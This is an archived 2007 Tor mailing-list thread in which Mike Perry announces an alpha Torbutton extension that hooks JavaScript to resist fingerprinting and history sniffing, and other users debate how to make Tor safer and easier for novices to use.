Re: Securing teh Intarwebs (Ultimate Solution ;)

[Mike Perry]

Thus spake light zoo ([EMAIL PROTECTED]):

> > The result of this mad vision quest is a new and
> > improved Torbutton.
> 
> Excellent work 
> 
> BTW, what do I have to eat to have a "mad vision
> quest" like yours? ;-)

Was going to wait 2 hours to answer this, but what the hell, it's
already tomorrow according to my Torbutton extension ;). Happy new
year!

The key to Illumination is not so much what you eat, it's more so what
you don't eat. First, you have to purge your diet of all processed
foods and chemical additives. This is the first step in freeing
yourself from the stranglehold of poor health inflicted upon the
masses by the Dark Illuminati in order to better subjugate them. Right
now I'm drinking a nice tall glass of unpastuerized, unhomoginzed
milk. Yum.

Once you purify the body it is time to purify the mind. This is
accomplished by staring Death in the face. Only by realizing that when
you die, your existance is no more than the set of desires you
manifest at the moment of death, are you able to achieve immortality.
Write your 5 core personal values on a sheet of paper right now! Do
not hesitate. Now burn this paper. This is the secret of the Dali Lama
and the key to immortality. Use it well.

Once the mind is clean, it is time to purify the spirit. Every week
for N weeks or until you get bored you must devote yourself fully to a
new diety. Yin, Yang, Yaweh, Allah, Gozer, Baphomet, Chaos, Chronos,
Eros, Erebus, Nyx, Bob, Xenu, Yoda, and Lord Sidius are all excellent
choices. Once you realize the power of devotion is not to pray to a
god, or beg them to help you, but instead to channel their Force
through you to affect change in the world, you unify with that diety,
and are thus enlightened in selfless pursuit of the one Unifying
Force: Change.

That's it. That's all you need to know. I hereby dub you Illuminated.
You shall now henceforth be known as Sir Renegade Buddhist Light Zoo.


Watch out, the inmates are running the asylum.

http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul

-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs

Re: Securing teh Intarwebs (Ultimate Solution ;)

[Mike Perry]

Thus spake Mike Perry ([EMAIL PROTECTED]):

> Also, it appears that we also need to hook
> document.defaultView.getComputedStyle(link,null).getPropertyValue();
> somehow (perhaps by hooking getComputedStyle and clearing all
> properties for its return value if it is an "A" tag like I do with
> document.getElement*, or possibly by hooking the getPropertyValue
> method on the returned object) in order to defeat
> http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

No, this is stupid. The adversary can just walk the DOM and look for A
tags. You have to be pro-active and walk the whole DOM first yourself,
and strip the attributes off of each A tag as you find it.

Or, perhaps getting the history clearing thing to work is the real
Ultimate Solution. You can use fileio in javascript to read
history.dat (see jshooks.js), but the main issue is file locking on
windows may prevent you from writing it out again since it appears firefox
never actually closes the file. It's worth a shot though. Perhaps they
don't lock the file while they have it open, and maybe they seek to the
beginning of it each time they read it out...

Ok, I promise I won't reply to myself any more. ;)

-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs

Re: Securing teh Intarwebs (Ultimate Solution ;)

[light zoo]

--- Mike Perry <[EMAIL PROTECTED]> wrote:

> The result of this mad vision quest is a new and
> improved Torbutton.

Excellent work 

BTW, what do I have to eat to have a "mad vision
quest" like yours? ;-)


 

It's here! Your new message!  
Get new email alerts with the free Yahoo! Toolbar.
http://tools.search.yahoo.com/toolbar/features/mail/

Re: Securing teh Intarwebs (Ultimate Solution ;)

[Mike Perry]

Thus spake Mike Perry ([EMAIL PROTECTED]):

> The goal of this extension is to make javascript as safe as it can be
> to use over Tor, modulo browser vulerabilities (which the FF people
> will actually fix.. They seem to enjoy arbitrary sites being able to
> query their history and search keywords, however.. That is a "feature").

The long-standing firefox bug is:
https://bugzilla.mozilla.org/show_bug.cgi?id=14

It should be noted that the reason commonly given for not fixing is
that they don't care about specific URLs being queried and would
rather have styles work properly (why not have both? Obviously they
haven't heard the phrase "Ultimate Solution" :). However Billy
Hoffman's talk at shmoocon pointed out that you can query 10s of
thousands of urls per second on a fast machine, more than enough to
troll for permutations of google keyword searches.


This is probably also worth investigating:
http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/

That technique uses CSS to fetch background images for visited links.
Bear in mind that images probably can be encoded with unique IDs by
exit nodes, so this probably is relevant. 

It is posisble to enumerate and edit CSS stylesheets using javascript,
so perhaps this can be eliminated with an additional hook in
jshooks.js as well, but there may be issues with getting an event
handler that fires at the right time. You can find archives of me
harassing the mozilla extensions people about event handlers at:
http://groups.google.com/group/mozilla.dev.extensions/browse_thread/thread/0bad4be7ec5ca99b/5525a6040a5395c8#5525a6040a5395c8


Also, it appears that we also need to hook
document.defaultView.getComputedStyle(link,null).getPropertyValue();
somehow (perhaps by hooking getComputedStyle and clearing all
properties for its return value if it is an "A" tag like I do with
document.getElement*, or possibly by hooking the getPropertyValue
method on the returned object) in order to defeat
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

This technique does not seem to work on FF2.0.0.3:
http://www.gnucitizen.org/projects/hscan-redux/poc.htm


Sorry I don't have time for this stuff right now, it is really
interesting and I wish I could do it. I should have more time in ~1
month (unless I discover one of these to be particularly low hanging
fruit and have some downtime on a train one day).



-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs

Re: Securing teh Intarwebs (Ultimate Solution ;)

[Mike Perry]

Thus spake Mike Perry ([EMAIL PROTECTED]):

> 1. It turns off browser plugins when you click a button in the statusbar,
>and also whenever Tor is on.
> 
> 2. It clears your cookies whenever you toggle tor.
> 
> 3. It hooks "dangerous" javascript functions, including:
>A. The Date() object, which can reveal your timezone
>B. document.getElement* which can be used to probe CSS attributes
>   to see if you have visited certain sites or issued certain
>   google queries: http://gemal.dk/browserspy/css.html
>C. navigator.oscpu and navigator.platform, two OS revealing strings
>   not managed by UserAgentSwitcher.
> 
> 4. It can optionally clear history whenever tor is toggled
>(unfortunately saving non-tor history is not possible yet. Firefox
> DOES have an API to do this, but it is "not implemented").

> KNOWN ISSUES (AKA HELP PLZ!):
> 
> This extension has been tested to work on FF2.0 and FF1.5. FF1.5
> unfortunately lacks a sane TabOpen event, so plugins are not properly
> disabled for new tabs when they open. FF2.0 seems ok.
> 
> I tried the code snippets for FF1.5 for this from
> http://developer.mozilla.org/en/docs/Code_snippets:Tabbed_browser
> but I was unable to get it to deliver events just for a tab, and I
> eventually gave up. I am not planning on suppoting FF1.5 ever. If you
> like FF1.5, please submit a patch. It's possible I was just doing
> something dumb. I did only learn javascript 5 days ago :)
> 
> It might also be nice if someone changed that "J" graphic to a "P" for
> plugins, and also made a button for toggling the javascript.enabled
> pref (and hooked it up so it actually worked).

UNKNOWN ISSUES (AKA HELP PLZ!):

If there are any javascript gurus on the list (or if anyone has the
time to do the research to become one, it doesn't take that long and
is the path to Real Ultimate Power ;), we need to consider if there
are any other javascript issues that we should be concerned about. 

Researching techniques on http://gemal.dk/browserspy/ is a good place
to start. http://en.wikipedia.org/wiki/XMLHttpRequest and
http://developer.mozilla.org/en/docs/Gecko_DOM_Reference can't hurt
either.

Obviosuly all sorts of AJAX/XMLHttpRequest stuff can be done by exit
nodes to steal your sessions and such, but they can do that with plain
old cookies anyways. Presumably for anything that matters, you either
use https, disable js, or don't use that site.

Interestingly enough, Tor DOES protect you from JS doing crazy things
like reconfiguring your router and portscanning your intranet (yes,
this CAN be done), since JS will always use proxy settings (modulo
browser vulnerabilities). So hey, we can claim we do in fact provide
some added security! ;)



-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs

Securing teh Intarwebs (Ultimate Solution ;)

[Mike Perry]

So I've spent the last week burried in javascript, xml, xbl, and
something pronounced "Zool". I seem to have survived, but it is quite
possible I may turn into a fire breathing demondog at any moment. Hail
Gozer.

The result of this mad vision quest is a new and improved Torbutton.
Based off of TorButton 1.0.4, it has the following additional features:

1. It turns off browser plugins when you click a button in the statusbar,
   and also whenever Tor is on.

2. It clears your cookies whenever you toggle tor.

3. It hooks "dangerous" javascript functions, including:
   A. The Date() object, which can reveal your timezone
   B. document.getElement* which can be used to probe CSS attributes
  to see if you have visited certain sites or issued certain
  google queries: http://gemal.dk/browserspy/css.html
   C. navigator.oscpu and navigator.platform, two OS revealing strings
  not managed by UserAgentSwitcher.

4. It can optionally clear history whenever tor is toggled
   (unfortunately saving non-tor history is not possible yet. Firefox
DOES have an API to do this, but it is "not implemented").


http://fscked.org/proj/minihax/TorButton/TorButton-1.1.0-alpha-dev.xpi

The goal of this extension is to make javascript as safe as it can be
to use over Tor, modulo browser vulerabilities (which the FF people
will actually fix.. They seem to enjoy arbitrary sites being able to
query their history and search keywords, however.. That is a "feature").


ALPHA WARNING:

This is ALPHA software. It desperately needs someone to review it and
to try to break it. Especially the Date hooks. Those are complicated,
and feeding Date various malformed strings to parse may cause it to
generate a time with an offset from the actual time that reveals your
timezone, among other issues. I tried my best to guard against these
types of issues, but it could really use another pair of eyes. Or
several.

Additionally, it would be nice if someone could verify that popups,
iframes, frames, and other crazy gimpy windows properly hook Date()
and disable plugins. I tested iframes and frames briefly, but I did
not test popups.


ABANDONWARE WARNING:

I am not terribly interested in maintaining this extension. Especially
not for the next month or so. However, I will consider fixing serious
bugs involving my hooks of Date(), but likely not in any timely
fashion. If absolutely nothing happens with this after a month, I will
add it to my pile of responsibilities. But I should probably find the
time to pay my utilities first. I'm really hoping Scott will pick up my
changes and continue maintaining this extension.


KNOWN ISSUES (AKA HELP PLZ!):

This extension has been tested to work on FF2.0 and FF1.5. FF1.5
unfortunately lacks a sane TabOpen event, so plugins are not properly
disabled for new tabs when they open. FF2.0 seems ok.

I tried the code snippets for FF1.5 for this from
http://developer.mozilla.org/en/docs/Code_snippets:Tabbed_browser
but I was unable to get it to deliver events just for a tab, and I
eventually gave up. I am not planning on suppoting FF1.5 ever. If you
like FF1.5, please submit a patch. It's possible I was just doing
something dumb. I did only learn javascript 5 days ago :)

It might also be nice if someone changed that "J" graphic to a "P" for
plugins, and also made a button for toggling the javascript.enabled
pref (and hooked it up so it actually worked).


BRIEF EXPLAINATION OF SOURCE:

XPIs are zips of jar files that contain javascript and xml. The jar
files themselves are also zips. The javascript hooking magic is done
in jshooks.js. The plugin toggling and events for javascript are in
torbutton.js.


Good luck!


-- 
Mike Perry
Mad Computer Scientist
fscked.org evil labs

Re: Re[4]: Ultimate solution

[Michael_google gmail_Gersten]

Perhaps this is the way to think about it:

For some people, in some situations, perfect anonymity is needed, with
nothing less.

For other people, or other situations, "nearly" is good enough, based
on what you want to accomplish:
1. Preventing ISP's from tracking and selling your browsing history
2. Preventing third parties, such as ad sites, from doing the same
3. Preventing search engines from assembling your "search history",
and turning it over to the government.
4. Preventing sites that you don't log into from accumulating your
local browse history over time.

That's not perfect, but that's good enough for me.

Re: Re[4]: Ultimate solution

[JT]

I wasn't saying that anonymity is a binary but the user's behavior.
Either he is doing the best possible thing to be anonymous or he isn't!
See what I wrote! If he isn't then we don't care about the reason. He
forgot, sloppiness, etc
Why not help him and force him to do the best possible thing to be
anonymous?

Understand now what I am trying to say?


> Security is NOT binary, it is a process, and it is a gradient. We only
> desire the illusion of it being binary. There is compromise in every
> design, take tor for example using 128bit crypto because it is pretty
> secure and fast enough to encrypt on the fly. I'm sure there are
> people that wish it was doing 512bit elliptic curve or some other
> thing out there.
> 
> However,  it  is  possible we could come up with some secure-only mode
> which   locks  out  most  features,  virtually  all  the  plugins  and
> functionality, and puts the user in a rigid framework in order to give
> a  little  more  security  and  a stronger impression of anonymity. Of
> course,  this  makes  it a significantly unpleasant experience and one
> might as well use lynx at that point.
> 
> Regards,
> Arrakis
> 
> >> As I said it is possible, but when you treat the user like a child it
> >> is going to be an issue to get them to keep using it.
> 
> > Why? Surfing anonymously is a binary. Either 1) everything is set
> > perfectly to be secure and anonymous or 2) it is not.
> > There are two types of Tor users. Tor literate and Tor illiterate users.
> > The thing that both have in common is that they could accidentally
> > enable scripting or forget to turn in off. Both types would be greatful
> > for a mechanism that would force them to turn things off and not allow
> > them to use Tor otherwise.
> 
> > After all they can choose to use Tor or not. Be anonymous or not be
> > anonymous. There is nothing third "state". Nobody would feel "being
> > treated as a child".
> > -- 
> >   JT
> >   [EMAIL PROTECTED]
> 
> 
> 
> 
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - A fast, anti-spam email service.

Re: Re[4]: Ultimate solution

[Kasimir Gabert]

Hello Arrakis,

I believe that JT was saying that there are binary options regarding
whether you are properly using TOR, or not properly using TOR.  You
are arguing that TOR itself is not considered "Security".  He is
saying that people who have deemed TOR to be secure and anonymous can
either be using TOR properly or could have scripting, or other similar
things enabled, and thus compromising what they have deemed as secure.

And there is a *huge* difference between disabling all scripting and
using Lynx.  Lynx has no scripts, but also no images, not frames, no
color choices, and a very small screen size.  You can browse just as
"securely" with a properly configured Mozilla client as you can with
Lynx.  The security does not come from not downloading pictures, which
is the main distinguishing factor when compared with Lynx, it comes
from disabling scripting.

Just my two cents,
Kasimir

On 3/29/07, Arrakis <[EMAIL PROTECTED]> wrote:

JT,

Security is NOT binary, it is a process, and it is a gradient. We only
desire the illusion of it being binary. There is compromise in every
design, take tor for example using 128bit crypto because it is pretty
secure and fast enough to encrypt on the fly. I'm sure there are
people that wish it was doing 512bit elliptic curve or some other
thing out there.

However,  it  is  possible we could come up with some secure-only mode
which   locks  out  most  features,  virtually  all  the  plugins  and
functionality, and puts the user in a rigid framework in order to give
a  little  more  security  and  a stronger impression of anonymity. Of
course,  this  makes  it a significantly unpleasant experience and one
might as well use lynx at that point.

Regards,
Arrakis

>> As I said it is possible, but when you treat the user like a child it
>> is going to be an issue to get them to keep using it.

> Why? Surfing anonymously is a binary. Either 1) everything is set
> perfectly to be secure and anonymous or 2) it is not.
> There are two types of Tor users. Tor literate and Tor illiterate users.
> The thing that both have in common is that they could accidentally
> enable scripting or forget to turn in off. Both types would be greatful
> for a mechanism that would force them to turn things off and not allow
> them to use Tor otherwise.

> After all they can choose to use Tor or not. Be anonymous or not be
> anonymous. There is nothing third "state". Nobody would feel "being
> treated as a child".
> --
>   JT
>   [EMAIL PROTECTED]








--
Kasimir Gabert

Re[4]: Ultimate solution

[Arrakis]

JT,

Security is NOT binary, it is a process, and it is a gradient. We only
desire the illusion of it being binary. There is compromise in every
design, take tor for example using 128bit crypto because it is pretty
secure and fast enough to encrypt on the fly. I'm sure there are
people that wish it was doing 512bit elliptic curve or some other
thing out there.

However,  it  is  possible we could come up with some secure-only mode
which   locks  out  most  features,  virtually  all  the  plugins  and
functionality, and puts the user in a rigid framework in order to give
a  little  more  security  and  a stronger impression of anonymity. Of
course,  this  makes  it a significantly unpleasant experience and one
might as well use lynx at that point.

Regards,
Arrakis

>> As I said it is possible, but when you treat the user like a child it
>> is going to be an issue to get them to keep using it.

> Why? Surfing anonymously is a binary. Either 1) everything is set
> perfectly to be secure and anonymous or 2) it is not.
> There are two types of Tor users. Tor literate and Tor illiterate users.
> The thing that both have in common is that they could accidentally
> enable scripting or forget to turn in off. Both types would be greatful
> for a mechanism that would force them to turn things off and not allow
> them to use Tor otherwise.

> After all they can choose to use Tor or not. Be anonymous or not be
> anonymous. There is nothing third "state". Nobody would feel "being
> treated as a child".
> -- 
>   JT
>   [EMAIL PROTECTED]

Re: Re[2]: Ultimate solution

[JT]

> As I said it is possible, but when you treat the user like a child it
> is going to be an issue to get them to keep using it.

Why? Surfing anonymously is a binary. Either 1) everything is set
perfectly to be secure and anonymous or 2) it is not.
There are two types of Tor users. Tor literate and Tor illiterate users.
The thing that both have in common is that they could accidentally
enable scripting or forget to turn in off. Both types would be greatful
for a mechanism that would force them to turn things off and not allow
them to use Tor otherwise.

After all they can choose to use Tor or not. Be anonymous or not be
anonymous. There is nothing third "state". Nobody would feel "being
treated as a child".
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - I mean, what is it about a decent email service?

Re: Re[2]: Ultimate solution

[Michael_google gmail_Gersten]

2. Where will this be displayed, and who is going to read it? (Simple usage 
instructions)


On the download page. On the "Configure Privacy" page. When you get
"By default, all scripting is blocked. Click here to configure safety
level of scripting" on the second or third web page you go to.


3. Why keep any cookies at all after a session? (Common cookies for the 
tracking sites)


After a session? How long do your sessions last? Mine last days.


6. I especially like #6, now how to we get the tor network to route this
as an exit node?


It's my understanding that if you want a connection to x.y.z.t:p, and
x.y.z.t is running a tor node that permits exit on p, then you are
guaranteed to use x.y.z.t as your exit node.

What about "Even if I'm just a middleman" node? Does it still permit
local exit? (I don't know).

What about a trivial setup for "Allow anything to exit on my node". Or
even just "Allow web / ftp / SSH / secure mail (or whatever other
checkboxes are wanted) to exit on my node", without any bandwidth
sharing for the network (litterally, just an exit-only configuration
to help others who are using tor. 100% secure, encrypted communication
without having to purchase an SSL certificate for your web site, or
having to deal with the "Do I need to translate this address to
add/remove www. at the beginning, all to keep their browser from
complaining, and redo that every year?".

Re[2]: Ultimate solution

[Arrakis]

Well it is possible, but as was stated before I don't think that
active content is the culprit.

It would work like this: Tor button is on automatically, meaning tor
is selected. In this mode noscript preferences are locked to global
deny. When Tor button is off, noscript prefs are unlocked, but block
by default.

As I said it is possible, but when you treat the user like a child it
is going to be an issue to get them to keep using it.

Regards,
Arrakis

> Is it really that difficult to test if active content is disabled?
> The Tor software should not work(i.e. the "start tor" button should not
> be clickable) if the user hasn't deactivated Javascript, Flash, Java,
> etc.
> Is this difficult do implement? There are not too many browsers.
> -- 
>   JT
>   [EMAIL PROTECTED]

Re: Ultimate solution

[JT]

Is it really that difficult to test if active content is disabled?
The Tor software should not work(i.e. the "start tor" button should not
be clickable) if the user hasn't deactivated Javascript, Flash, Java,
etc.
Is this difficult do implement? There are not too many browsers.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Or how I learned to stop worrying and
  love email again

Re[2]: Ultimate solution

[Arrakis]

1. People may not want to use it if it starts sharing their IP for
the network. Although, acting as a middleman may be a good compromise.
In Torpark 3.0, we can probably do most of these.

2. Where will this be displayed, and who is going to read it?

3. Why keep any cookies at all after a session?

4. Sure. We can do this with Torpark 3.0

5. Already covered

6. I especially like #6, now how to we get the tor network to route this
as an exit node? Well... it would be great that instead of hashes we
could name the onion addresses fully. So if you wanted to check if
torrify.com had an exit node you could use to access it, you could
simply do torrify.com.onion... a simple naming convention.


Regards,
Arrakis

> It sounds to me like we need:
> 1. Absolutely easy to use client software that automatically acts as a
> router/server
> -- Needs to determine the lower (upstream) bandwidth, and not clog it
> -- Needs to be able to prioritize local originating connections to
> eliminate the desire to run separate client and server tor processes
> -- -- This includes using as much upstream as the local origination
> needs, even if it means nearly starving all "through me" traffic
> -- -- This means getting flow control working inside Tor, unless I
> missed something.
> -- Needs to be able to work with dynamic IP transparantly
> -- -- Tor currently does this if NO Address line is in the config
> file, but Vidallia insists on putting one in there anyways.

> 2. Simple instructions to end users
> -- Anonimity != privacy
> -- Things like flash, etc, can break privacy and reveal who you are
> -- Some sort of 'This is known to be safe, this is most likely unsafe,
> this is "maybe" ' list.

> 3. A preconfigured set of cookies for the major known cookie tracking
> sites (ads, etc), so that every Tor user looks the same.

> 4. Ideally a patch for Firefox. IE allows you to say "Accept 1st party
> cookies, reject 3rd party cookies." Safari allows you to say "Only
> accept cookies from sites I navigate to, but not from sites linked to
> them (Advertisements)". Firefox doesn't have that.

> 5. (Privoxy already strips referrer information, so that's not leaking
> your search history, etc, to third parties).

> ** 6 **. Since Tor will route to an exit node on the same machine as
> your target, giving end-to-end transparent encryption, some sort of
> push to get the major web sites to run at least a "local exit" tor
> node. In particular, we need an absolutely trivial, out of the box,
> "Local only, any port" tor exit config.


> On 3/27/07, Freemor <[EMAIL PROTECTED]> wrote:
>> On Mon, 2007-26-03 at 23:53 -0700, JT wrote:
>> > You are making a very big mistake! In theory your are correct with what
>> > you are saying but you are assuming the total noob can learn how to safe
>> > anonymously but also give grandma a chance to surf anonymously. Grandma
>> > knows what a browser is but has never heard about encryption or TCP/IP.
>> >
>>
>> I think that if the information is geared to the new user that they will
>> be able to pick it up. You don't need to get all technical to explain
>> everything. you could just say "if your browser doesn't display the lock
>> icon, like when using a banking site, your communication is anonymous
>> but not confidential, and may reveal identifying information."
>>
>> I also think there is a real problem with the "a new user could never
>> understand this" thinking. One should never assume that ones audience is
>> less intelligent then you are. Also, even if the effort manages to only
>> educate 30% of the new users this is far superior to not making the
>> effort and having only the very enthusiastic users who have the skills
>> to dig up the documentation they need being educated.
>>
>> Freemor

Re: Ultimate solution

[Michael_google gmail_Gersten]

It sounds to me like we need:
1. Absolutely easy to use client software that automatically acts as a
router/server
-- Needs to determine the lower (upstream) bandwidth, and not clog it
-- Needs to be able to prioritize local originating connections to
eliminate the desire to run separate client and server tor processes
-- -- This includes using as much upstream as the local origination
needs, even if it means nearly starving all "through me" traffic
-- -- This means getting flow control working inside Tor, unless I
missed something.
-- Needs to be able to work with dynamic IP transparantly
-- -- Tor currently does this if NO Address line is in the config
file, but Vidallia insists on putting one in there anyways.

2. Simple instructions to end users
-- Anonimity != privacy
-- Things like flash, etc, can break privacy and reveal who you are
-- Some sort of 'This is known to be safe, this is most likely unsafe,
this is "maybe" ' list.

3. A preconfigured set of cookies for the major known cookie tracking
sites (ads, etc), so that every Tor user looks the same.

4. Ideally a patch for Firefox. IE allows you to say "Accept 1st party
cookies, reject 3rd party cookies." Safari allows you to say "Only
accept cookies from sites I navigate to, but not from sites linked to
them (Advertisements)". Firefox doesn't have that.

5. (Privoxy already strips referrer information, so that's not leaking
your search history, etc, to third parties).

** 6 **. Since Tor will route to an exit node on the same machine as
your target, giving end-to-end transparent encryption, some sort of
push to get the major web sites to run at least a "local exit" tor
node. In particular, we need an absolutely trivial, out of the box,
"Local only, any port" tor exit config.


On 3/27/07, Freemor <[EMAIL PROTECTED]> wrote:

On Mon, 2007-26-03 at 23:53 -0700, JT wrote:
> You are making a very big mistake! In theory your are correct with what
> you are saying but you are assuming the total noob can learn how to safe
> anonymously but also give grandma a chance to surf anonymously. Grandma
> knows what a browser is but has never heard about encryption or TCP/IP.
>

I think that if the information is geared to the new user that they will
be able to pick it up. You don't need to get all technical to explain
everything. you could just say "if your browser doesn't display the lock
icon, like when using a banking site, your communication is anonymous
but not confidential, and may reveal identifying information."

I also think there is a real problem with the "a new user could never
understand this" thinking. One should never assume that ones audience is
less intelligent then you are. Also, even if the effort manages to only
educate 30% of the new users this is far superior to not making the
effort and having only the very enthusiastic users who have the skills
to dig up the documentation they need being educated.

Freemor

Re: Ultimate solution

[Freemor]

On Mon, 2007-26-03 at 23:53 -0700, JT wrote:
> You are making a very big mistake! In theory your are correct with what
> you are saying but you are assuming the total noob can learn how to safe
> anonymously but also give grandma a chance to surf anonymously. Grandma
> knows what a browser is but has never heard about encryption or TCP/IP.
> 

I think that if the information is geared to the new user that they will
be able to pick it up. You don't need to get all technical to explain
everything. you could just say "if your browser doesn't display the lock
icon, like when using a banking site, your communication is anonymous
but not confidential, and may reveal identifying information."

I also think there is a real problem with the "a new user could never
understand this" thinking. One should never assume that ones audience is
less intelligent then you are. Also, even if the effort manages to only
educate 30% of the new users this is far superior to not making the
effort and having only the very enthusiastic users who have the skills
to dig up the documentation they need being educated.

Freemor





--

Freemor <[EMAIL PROTECTED]>
Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG




signature.asc
Description: This is a digitally signed message part

Re[4]: Ultimate solution

[Arrakis]

> How can the ratio of router/clients be improved? Every client must
> become a router. There is no other way. There must be a simple button
> "Yes, I want to be  an exit." or "No, I don't want to be an exit". I
> know this will take many, many hours of coding and I am not criticizing
> but wishful thinking won't get this great project anywhere. Yes, there
> are many nice people that run servers but the network will soon suffer a
> heart attack as the number of clients grows much faster than the number
> of routers.

I could add this function to Torpark, if:
1) A lot of people want it
2) TOR project implements directory distribution that can use these
temporary middleman and exit nodes as a positive, rather than
depending on long-lived nodes.

> Here is some really great idea. How about some function in Tor into
> which users can enter their .onion bookmarks along with a description!
> 99.9% of the Tor users have no idea that there are hidden services. No
> Tor user I ever met knew about the hidden wiki and all its links.

You can do this with Torpark right now. You can reach .onion addresses
right from the address bar. If people would like to compile a list of
services, I could publish that list as browser bookmarks in the next
release of Torpark.

Regards,
Steve

Re: Ultimate solution

[JT]

Hi,

> > Let the users surf the tor net instead of the www
> 
> Thats just plain stupid. Should Tor become just another Freenet clone? I
> don't think so.
> 
> The whole point of Tor is that you can surf "normal web"  and not just
> another Tor-users websites.

That i snot stupid! Tor has this great capabiliy. Let users make the
most of it.
Tor is providing what the WWW is lacking. End to End encryption. Of
course was meant to surf the www anonymously.
But ever heard about evolution?
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - A no graphics, no pop-ups email service

Re: Ultimate solution

[M]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


> Let the users surf the tor net instead of the www

Thats just plain stupid. Should Tor become just another Freenet clone? I
don't think so.

The whole point of Tor is that you can surf "normal web"  and not just
another Tor-users websites.

M

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3-cvs (MingW32)
Comment: GnuPT 2.7.6
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGCM6N6fSN8IKlpYoRAmyfAJ9rfPom7M6c8dAiDbD0Dg7xHiO+/wCeKkSl
++z5TKQ5r7wnNttnHP75nXY=
=AF+g
-END PGP SIGNATURE-

Re: Re[2]: Ultimate solution

[JT]

To be able to create a kick arse anonymity software we have to face
reality.

Fact is:

1) there are evil exit nodes(this won't change, no matter what)
2) there are tons of noob(this won't change, no matter what)
3) there are to few routers/exits for the clients(this bad ratio won't
change no matter how fast the network grows)
4) even if the people will change the habits of not sending sensitive
message through not encrypting exit nodes there will be new tor users
who will

Solution

Let the users surf the tor net instead of the www(encrypted messages ->
don't care about evil exits as they can not inject anything bad) as much
as possible.
To keep tor users on the tor net there must be a huge number of
websites. A huge number of websites can only be achieved by having an
integrated secure and preconfigured web server. Grandma will never learn
how to set up a webserver but she knows how to use a Wysiwyg editor to
create html pages to tell people about her life under dictatorship for
example.

How can the ratio of router/clients be improved? Every client must
become a router. There is no other way. There must be a simple button
"Yes, I want to be  an exit." or "No, I don't want to be an exit". I
know this will take many, many hours of coding and I am not criticizing
but wishful thinking won't get this great project anywhere. Yes, there
are many nice people that run servers but the network will soon suffer a
heart attack as the number of clients grows much faster than the number
of routers.

Here is some really great idea. How about some function in Tor into
which users can enter their .onion bookmarks along with a description!
99.9% of the Tor users have no idea that there are hidden services. No
Tor user I ever met knew about the hidden wiki and all its links.

Right now the only entry point to the Tor net is the link on the tor
site. If every user could enter links of his friends or sites that he
knows about into his tor client(which is searchable by other tor
clients) then this would help make the Tor net known big time! Similar
to freenet where a start page opens. Also if the clients could keep
track of when a tor site was last reachable then that would rock!
Similar to emule where the software knows when a file was last seen
complete. No need to have link section on .onion sites and update the
links.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Or how I learned to stop worrying and
  love email again

Re: Ultimate solution

[JT]

You are making a very big mistake! In theory your are correct with what
you are saying but you are assuming the total noob can learn how to safe
anonymously but also give grandma a chance to surf anonymously. Grandma
knows what a browser is but has never heard about encryption or TCP/IP.


On Sat, 24 Mar 2007 00:50:15 -0400, "Freemor" <[EMAIL PROTECTED]> said:
>   I've been watching this thread with some interest and just wanted to
> add my view to the discussion. I think there is a real danger in making
> TOR too easy. Yes, I do understand that Microsoft and others have
> created a world of people that want every program to function completely
> with 3 clicks. For some applications this is a laudable goal. 
> 
>   However, when one is dealing with a program that deals with security
> or anonymity I think it is important that people who intend to use the
> program take the time and effort to learn. They need to learn what it
> does, what it doesn't do, how it does it, how it is circumvented, how to
> check if it is working correctly, etc. One of the major reasons there is
> so much tracking of personal data on the web is most users lack of
> responsibility for their own privacy and security.
> 
>   For these reasons, my concern is that making TOR a 3 click wonder will
> not only further propagate this "some one else will worry about my
> privacy/security for me" thinking and ultimately would lead people to a
> false sense of security because they wont properly understand the TOR
> network, and will blissfully find ways to make their computer leak more
> then a bucket with no bottom, all the while thinking "oh, it's fine,
> I've got TOR on, I can see the icon in the systray right there".
> 
>   I feel that rather then head down the 3 click wonder path, it would be
> better to invest time in reminding users that we are talking about their
> security, or their anonymity, that as such it is their responsibility,
> and decidedly worth the time to learn as much as possible about the
> programs or systems they use to protect it. 
> 
>   I would hate to see the day when the TOR team has to waste countless
> hours and resources to battle complaints that "TOR failed to protect me
> when I ".
> 
> Just my thoughts on the subject
> 
> Freemor
> 
> P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> That just snuck in there as I deal with computer security regularly and
> often see the same "the computer/internet/isp/mysterious someone" should
> take care of that for me mentality.   
> 
> On Fri, 2007-23-03 at 02:44 -0700, JT wrote:
> > Hi,
> > 
> > why spend hundreds and thousands of hours of coding?
> > 
> > Is there a browser that doesn't support javascript, java, flash,
> > quicktime, etc but only pictures so one can read html text and pictures
> > and can read a normal newspaper? If there is such a browser why not
> > force Tor users to use it? Make Tor only work with that browser.
> > 
> > If Tor wants to be an anonymous communication tool it should come in an
> > entire package. If Tor wants to be successful it MUST come in  complete
> > package.
> > 90% of the users use it to surf anonymously, the rest use ftp, chat or
> > whatever.
> > 
> > How about instead of telling a user to:
> > 
> > install tor and vidalia
> > activate tor
> > install the tor button
> > intstall the noscript
> > install flashblock
> > configure noscript
> > deactivate flash, etc
> > install cookie culler 
> > turn off the referer header in the browser
> > etc
> > etc
> > 
> > have them just install the "package for free communication".
> > That way there is no way they can forget to turn anything off or on.
> > That way every person that uses the "Tor package for free communication"
> > can benefit from the expertise of the people that release the package.
> > All the "hacks" that are published are not against Tor but against the
> > users "communication package" that the users put together himself. Why
> > not help/force internet noobs to be safe.
> > 
> > I know it is called the Tor project but why not extend it to a real
> > communication package. Vidalia was as good start. Now one step further!!
> > 
> > Is there a free open source browser that could be shipped with the Tor
> > package that is fully configured for anonymous surfing and fine tuned to
> > be most anonymous, set so that it can be only used through Tor? It
> > should be modified so that a noob can not change the settins by
> > accident.
> > 
> > I am not a programmer but this is what must happen. If Tor is only
